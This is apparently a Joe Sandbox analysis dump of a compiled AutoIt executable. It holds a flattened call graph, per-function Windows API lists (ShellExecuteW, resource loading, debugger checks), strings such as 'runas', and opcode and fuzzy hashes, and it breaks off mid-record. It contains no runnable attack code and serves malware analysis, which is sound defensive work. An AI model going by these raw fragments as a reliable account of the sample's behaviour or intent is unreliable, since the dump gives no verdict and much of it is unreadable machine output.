94663->94664 94793 7ff75f14df90 94664->94793 94667 7ff75f1459a8 94666->94667 94668 7ff75f14e0a8 4 API calls 94667->94668 94670 7ff75f1459b5 94668->94670 94671 7ff75f145ab4 4 API calls 94670->94671 94671->94663 94674 7ff75f14d670 5 API calls 94675 7ff75f145a12 94674->94675 94675->94674 94676 7ff75f145ab4 4 API calls 94675->94676 94677 7ff75f145a60 Concurrency::wait 94675->94677 94676->94675 94677->94560 94679 
7ff75f143f29 wcsftime 94678->94679 94680 7ff75f143f4b 94679->94680 94681 7ff75f18ba2c memcpy_s 94679->94681 94682 7ff75f1456d4 5 API calls 94680->94682 94684 7ff75f18ba4d GetOpenFileNameW 94681->94684 94683 7ff75f143f56 94682->94683 95166 7ff75f143eb4 94683->95166 94685 7ff75f18bab0 94684->94685 94686 7ff75f143858 94684->94686 94688 7ff75f147cf4 4 API calls 94685->94688 94686->94568 94686->94571 94690 7ff75f18babc 94688->94690 94692 7ff75f143f6c 95184 7ff75f146394 94692->95184 94695 7ff75f143fb6 wcsftime 94694->94695 95227 7ff75f149734 94695->95227 94697 7ff75f143fc4 94698 7ff75f144050 94697->94698 95237 7ff75f144d28 77 API calls 94697->95237 94698->94571 94700 7ff75f143fd3 94700->94698 95238 7ff75f144b0c 79 API calls Concurrency::wait 94700->95238 94702 7ff75f143fe0 94702->94698 94703 7ff75f143fe8 GetFullPathNameW 94702->94703 94704 7ff75f147cf4 4 API calls 94703->94704 94705 7ff75f144014 94704->94705 94706 7ff75f147cf4 4 API calls 94705->94706 94707 7ff75f144028 94706->94707 94708 7ff75f18bac2 wcscat 94707->94708 94709 7ff75f147cf4 4 API calls 94707->94709 94709->94698 95242 7ff75f143d90 7 API calls 94710->95242 94712 7ff75f1438d5 94713 7ff75f143cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94712->94713 94714->94571 94715->94578 94716->94591 94718 7ff75f149be5 wcsftime 94717->94718 94719 7ff75f147cf4 4 API calls 94718->94719 94720 7ff75f149c1b 94718->94720 94719->94720 94722 7ff75f149c4a Concurrency::wait 94720->94722 94828 7ff75f149d84 94720->94828 94723 7ff75f149d21 94722->94723 94727 7ff75f14ec00 4 API calls 94722->94727 94729 7ff75f144680 4 API calls 94722->94729 94730 7ff75f149d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94722->94730 94724 7ff75f149d57 Concurrency::wait 94723->94724 94725 7ff75f14ec00 4 API calls 94723->94725 94724->94608 94726 7ff75f149d4a 94725->94726 94728 7ff75f144680 4 API calls 94726->94728 94727->94722 94728->94724 94729->94722 94730->94722 94831 7ff75f146d64 94731->94831 94734 
7ff75f146d64 2 API calls 94737 7ff75f14649d 94734->94737 94735 7ff75f1464ba FreeLibrary 94736 7ff75f1464c0 94735->94736 94835 7ff75f1748e0 94736->94835 94737->94735 94737->94736 94740 7ff75f18c8f6 94742 7ff75f14652c 63 API calls 94740->94742 94741 7ff75f1464db LoadLibraryExW 94854 7ff75f146cc4 94741->94854 94744 7ff75f18c8fe 94742->94744 94747 7ff75f146cc4 3 API calls 94744->94747 94749 7ff75f18c907 94747->94749 94748 7ff75f146505 94748->94749 94750 7ff75f146512 94748->94750 94876 7ff75f1467d8 94749->94876 94751 7ff75f14652c 63 API calls 94750->94751 94753 7ff75f145846 94751->94753 94753->94615 94753->94616 94756 7ff75f18c93f 95079 7ff75f151a30 94757->95079 94759 7ff75f14f029 94760 7ff75f19a7a8 94759->94760 94761 7ff75f14f040 94759->94761 95095 7ff75f14ee20 5 API calls Concurrency::wait 94760->95095 94764 7ff75f164c68 4 API calls 94761->94764 94763 7ff75f19a7bc 94765 7ff75f14f066 94764->94765 94767 7ff75f14f08f 94765->94767 95094 7ff75f14f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94765->95094 95090 7ff75f14f1bc 94767->95090 94769 7ff75f14f0c6 94769->94627 94771 7ff75f145ac6 94770->94771 94772 7ff75f145ae4 94770->94772 94773 7ff75f14e0a8 4 API calls 94771->94773 94774 7ff75f147cf4 4 API calls 94772->94774 94775 7ff75f14592d 94773->94775 94774->94775 94776 7ff75f168e28 94775->94776 94777 7ff75f168ea4 94776->94777 94778 7ff75f168e3f 94776->94778 95099 7ff75f168d98 35 API calls 2 library calls 94777->95099 94785 7ff75f168e63 94778->94785 95097 7ff75f1755d4 15 API calls abort 94778->95097 94781 7ff75f168ed6 94783 7ff75f168ee2 94781->94783 94790 7ff75f168ef9 94781->94790 94782 7ff75f168e49 95098 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94782->95098 95100 7ff75f1755d4 15 API calls abort 94783->95100 94785->94644 94787 7ff75f168e54 94787->94644 94788 7ff75f168ee7 95101 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94788->95101 94791 7ff75f168ef2 94790->94791 94792 7ff75f172c80 37 API calls wcsftime 94790->94792 
94791->94644 94792->94790 94794 7ff75f14dfac 94793->94794 94795 7ff75f164c68 4 API calls 94794->94795 94796 7ff75f1459f5 94794->94796 94795->94796 94797 7ff75f14d670 94796->94797 94798 7ff75f14d698 94797->94798 94802 7ff75f14d6a2 94798->94802 95102 7ff75f14880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94798->95102 94801 7ff75f199d43 94803 7ff75f14d7de 94802->94803 95103 7ff75f14ee20 5 API calls Concurrency::wait 94802->95103 94803->94675 94805 7ff75f1c29c8 94804->94805 95104 7ff75f1c2b70 94805->95104 94808 7ff75f1467d8 45 API calls 94809 7ff75f1c2a03 94808->94809 94810 7ff75f1467d8 45 API calls 94809->94810 94811 7ff75f1c2a23 94810->94811 94812 7ff75f1467d8 45 API calls 94811->94812 94813 7ff75f1c2a49 94812->94813 94814 7ff75f1467d8 45 API calls 94813->94814 94815 7ff75f1c2a6d 94814->94815 94816 7ff75f1467d8 45 API calls 94815->94816 94817 7ff75f1c2ac5 94816->94817 94818 7ff75f1c240c 32 API calls 94817->94818 94819 7ff75f1c2ada 94818->94819 94821 7ff75f1c29de 94819->94821 95109 7ff75f1c1d48 94819->95109 94821->94618 94823 7ff75f14653d 94822->94823 94824 7ff75f146542 94822->94824 94825 7ff75f174970 62 API calls 94823->94825 94826 7ff75f146558 94824->94826 94827 7ff75f14656f FreeLibrary 94824->94827 94825->94824 94826->94629 94827->94826 94829 7ff75f14a7c0 4 API calls 94828->94829 94830 7ff75f149d99 94829->94830 94830->94720 94832 7ff75f146490 94831->94832 94833 7ff75f146d74 LoadLibraryA 94831->94833 94832->94734 94832->94737 94833->94832 94834 7ff75f146d89 GetProcAddress 94833->94834 94834->94832 94836 7ff75f1747fc 94835->94836 94837 7ff75f17482a 94836->94837 94839 7ff75f17485c 94836->94839 94896 7ff75f1755d4 15 API calls abort 94837->94896 94842 7ff75f174862 94839->94842 94843 7ff75f17486f 94839->94843 94840 7ff75f17482f 94897 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94840->94897 94898 7ff75f1755d4 15 API calls abort 94842->94898 94884 7ff75f17feb4 94843->94884 94846 7ff75f1464cf 94846->94740 94846->94741 94848 
7ff75f174883 94899 7ff75f1755d4 15 API calls abort 94848->94899 94849 7ff75f174890 94891 7ff75f180304 94849->94891 94852 7ff75f1748a3 94900 7ff75f16df60 LeaveCriticalSection 94852->94900 95038 7ff75f146d1c 94854->95038 94857 7ff75f146cf1 94859 7ff75f146d0f FreeLibrary 94857->94859 94860 7ff75f1464f7 94857->94860 94858 7ff75f146d1c 2 API calls 94858->94857 94859->94860 94861 7ff75f146580 94860->94861 94862 7ff75f164c68 4 API calls 94861->94862 94863 7ff75f1465b5 memcpy_s 94862->94863 94864 7ff75f18c9f5 94863->94864 94865 7ff75f146740 CreateStreamOnHGlobal 94863->94865 94868 7ff75f146602 94863->94868 95042 7ff75f1c2e00 45 API calls 94864->95042 94866 7ff75f146759 FindResourceExW 94865->94866 94865->94868 94866->94868 94869 7ff75f18c97e LoadResource 94868->94869 94871 7ff75f1467d8 45 API calls 94868->94871 94873 7ff75f18c9fd 94868->94873 94875 7ff75f1466e8 94868->94875 94869->94868 94870 7ff75f18c997 SizeofResource 94869->94870 94870->94868 94872 7ff75f18c9ae LockResource 94870->94872 94871->94868 94872->94868 94874 7ff75f1467d8 45 API calls 94873->94874 94874->94875 94875->94748 94877 7ff75f1467f7 94876->94877 94878 7ff75f18ca6c 94876->94878 95043 7ff75f174c5c 94877->95043 94881 7ff75f1c240c 95062 7ff75f1c2200 94881->95062 94883 7ff75f1c2430 94883->94756 94901 7ff75f17b9bc EnterCriticalSection 94884->94901 94886 7ff75f17fecb 94887 7ff75f17ff54 18 API calls 94886->94887 94888 7ff75f17fed6 94887->94888 94889 7ff75f17ba10 _isindst LeaveCriticalSection 94888->94889 94890 7ff75f174879 94889->94890 94890->94848 94890->94849 94902 7ff75f180040 94891->94902 94894 7ff75f18035e 94894->94852 94896->94840 94897->94846 94898->94846 94899->94846 94903 7ff75f18007d try_get_function 94902->94903 94903->94903 94913 7ff75f180211 94903->94913 94917 7ff75f16db68 37 API calls 4 library calls 94903->94917 94905 7ff75f1802de 94921 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94905->94921 94907 7ff75f18021a 94907->94894 94914 7ff75f187738 94907->94914 94909 7ff75f180277 94909->94913 

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F1437F2
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143807
                                                            • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F14388D
                                                              • Part of subcall function 00007FF75F143F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF75F1438BF,?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143FFD
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143924
                                                            • MessageBoxA.USER32 ref: 00007FF75F18B888
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F18B8E1
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F18B968
                                                            • ShellExecuteW.SHELL32 ref: 00007FF75F18B98F
                                                              • Part of subcall function 00007FF75F143B84: GetSysColorBrush.USER32 ref: 00007FF75F143B9E
                                                              • Part of subcall function 00007FF75F143B84: LoadCursorW.USER32 ref: 00007FF75F143BAE
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BC3
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BDC
                                                              • Part of subcall function 00007FF75F143B84: LoadIconW.USER32 ref: 00007FF75F143BF5
                                                              • Part of subcall function 00007FF75F143B84: LoadImageW.USER32 ref: 00007FF75F143C21
                                                              • Part of subcall function 00007FF75F143B84: RegisterClassExW.USER32 ref: 00007FF75F143C85
                                                              • Part of subcall function 00007FF75F143CBC: CreateWindowExW.USER32 ref: 00007FF75F143D0C
                                                              • Part of subcall function 00007FF75F143CBC: CreateWindowExW.USER32 ref: 00007FF75F143D5F
                                                              • Part of subcall function 00007FF75F143CBC: ShowWindow.USER32 ref: 00007FF75F143D75
                                                              • Part of subcall function 00007FF75F146258: Shell_NotifyIconW.SHELL32 ref: 00007FF75F146350
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 1593035822-3287110873
                                                            • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction ID: d5afdb5693716aafadf4612bdb4b5387bf1271924a2ec1250352cae4aaf49102
                                                            • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction Fuzzy Hash: D57116A1E1C6C796EE20FB20F8541F9A760AF81358FC80135D64D466E6EF6CE60AC731

                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: AU3!$EA06$SCRIPT
                                                            • API String ID: 3051347437-2925976212
                                                            • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction ID: c2fba8f360167dfc98863fdd0942b383656a600dbff38c29a110e2837d82082a
                                                            • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction Fuzzy Hash: 4591D072F0968186EF20FB21E458AFCA7A0BB85B88F894135DE5D47785EF38E405C720

                                                            Similarity
                                                            • API ID: Process$CurrentInfoSystemVersionWow64
                                                            • String ID: |O
                                                            • API String ID: 1568231622-607156228
                                                            • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction ID: ae0ce194c706a407b03a5328b4cf533f75a0d3d0f39f3cc9560e4afa43788cc2
                                                            • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction Fuzzy Hash: 44D180E1A1D2C686EE21EB14B8001FDBB51AF55788FCE4076D68E036A1DF6CB644C772

                                                            Similarity
                                                            • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 1787492119-0
                                                            • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction ID: 29c5bef4f72508534a37c8c6bf92ecaa36442f00e3ef64d70f8e66723eb13bdb
                                                            • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction Fuzzy Hash: 72E1A022A08BC186EF44EB26E4501FDA7B1FB84B94F884536EE5D87799DF38E401C720
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction ID: 9ebc79af88040029f856e490cb5d0f53d81450801ec391300b72be3564e907e4
                                                            • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction Fuzzy Hash: 1EF01950D18682C2EF247B25B8483B593A0AF95B75FDC4330D57F062E4DF6CD85A4520

                                                            Similarity
                                                            • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                            • API String ID: 2667193904-1575078665
                                                            • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction ID: 88d8148bf59b74549f6eeb36385429dcac1ca405976371edd5b7ce55aeffeebb
                                                            • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction Fuzzy Hash: 61912962A18AC795EB10FB24F8400F9B365FF84784BC81136EA4D46AE9EF6CD545C760

                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction ID: be24ca065d9bea4dbbb269b77076873b05999ea510ef323eb3d7c7890136557a
                                                            • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction Fuzzy Hash: 735127B1E0C6CA81FE24BB14BA481F9E651BF85B84FCC0435D54E526E2EFACE5059731

                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-2659433951
                                                            • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction ID: 3e93a1d06f8cae9bfc14fe8c4ae66ee4c19066ef3c6e27baa45195fe2932710e
                                                            • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction Fuzzy Hash: DB312A72A04B858AEB00DF61F8843AC77B4FB44748F980135CA4D17794DF7C9159CB60

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: DestroySendStringUninitializeUnregisterWindow
                                                            • String ID: close all
                                                            • API String ID: 1992507300-3243417748
                                                            • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction ID: 38ed4f09545f109b63a85c0706ed1e1f8a6b77d89ce1dfe234ddfebd2ff2d799
                                                            • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction Fuzzy Hash: 35E12125F0A98281EE58FF16E5602FCA360BF94B44F9C4075DB4E57291DF3CE8628B64

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: AutoIt v3
                                                            • API String ID: 423443420-1704141276
                                                            • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction ID: 9f342112b4fa938c20d0e671c510ea12e92ca7a43d3903c51af170eb9de3f4df
                                                            • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction Fuzzy Hash: 7D3117B6E08B868AEB40EB51F8443ACB774FB88759F880039CA8D53B94DF7DD1558760

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction ID: d17d4117f6267eaac2752025b9db888d81ca4edebdb29b2b01d1f74d157ce3f5
                                                            • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction Fuzzy Hash: 3FC1DE32B18A818AFF10EB64E5813EC7761EB49BA8F481635DE2E5B795CF38D411C720

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 3249950245-0
                                                            • Opcode ID: 1488d278e781027eebb232eec22d80ed309101f57f8ed12946040d12c1005b51
                                                            • Instruction ID: 9770ce3237158d106403ccba0d31c1f46285a740f2a88e35b6ff3964732c9d01
                                                            • Opcode Fuzzy Hash: 1488d278e781027eebb232eec22d80ed309101f57f8ed12946040d12c1005b51
                                                            • Instruction Fuzzy Hash: 22228F72A0C6C286EF64AB25F4903F9B7A1EB45784F984136CA4E47695CF3DE441CB60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 849 7ff75f143cbc-7ff75f143d88 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Show
                                                            • String ID: AutoIt v3$d$edit
                                                            • API String ID: 2813641753-2600919596
                                                            • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction ID: 6cf192ba46cbe394447775443fae5fed3f9f54a3039bec00414154dc0e88ec2b
                                                            • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction Fuzzy Hash: C8215CB2A28B8187EB10DB10F4887A9B7A0F788799F954238D68D47694CFBDD145CB20

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162D8E
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162D9C
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DAC
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DBC
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DCA
                                                              • Part of subcall function 00007FF75F162D5C: MapVirtualKeyW.USER32(?,?,?,00007FF75F147FA5), ref: 00007FF75F162DD8
                                                              • Part of subcall function 00007FF75F15EEC8: RegisterWindowMessageW.USER32 ref: 00007FF75F15EF76
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F148209
                                                            • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F14828F
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F14106D), ref: 00007FF75F18D36A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: AutoIt
                                                            • API String ID: 1986988660-2515660138
                                                            • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction ID: ddcc5791534676491462a76e720ee215d9d7398871066ee61b01fd1c2706f77f
                                                            • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction Fuzzy Hash: 16C1B6E1D19BDA85EE40EB14B8800F8F7A4BF94758F98023AD54D436A5EF7CA141CB72

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_Stringwcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3135491444-1585850449
                                                            • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction ID: 852bde05240d7e13d79afaf09e1f7baf3d68ed6d42383b51e5ee307ffb5ff33b
                                                            • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
